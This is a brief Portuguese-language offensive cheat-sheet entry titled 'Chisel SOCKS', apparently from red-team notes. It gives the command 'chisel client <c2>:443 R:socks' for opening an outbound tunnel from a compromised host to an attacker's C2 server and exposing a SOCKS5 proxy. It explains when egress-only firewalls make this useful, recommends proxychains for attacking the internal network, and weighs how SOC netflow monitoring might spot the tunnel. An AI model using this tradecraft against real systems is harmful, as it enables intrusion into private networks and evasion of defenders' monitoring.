Chisel SOCKS
chisel client <c2>:443 R:socks
Abre um túnel TCP de saída do host comprometido para o seu C2 e expõe um proxy SOCKS5 para pivotar para a rede interna.
Execute quando o host comprometido puder sair para a internet, mas você não puder entrar diretamente (NAT, firewall permitindo apenas saída 443). O cliente chisel abre HTTPS para o seu servidor e você obtém um SOCKS5 no outro lado para atacar a rede interna com proxychains.
Se o egress filtrar por SNI ou o SOC monitorar conexões longas para IPs de hospedagem, o túnel saltará no netflow. Para mover grandes volumes, o SOCKS sobre chisel fica lento; para uma única porta (um RDP), um reverse port forward do chisel ou ssh -R é mais simples.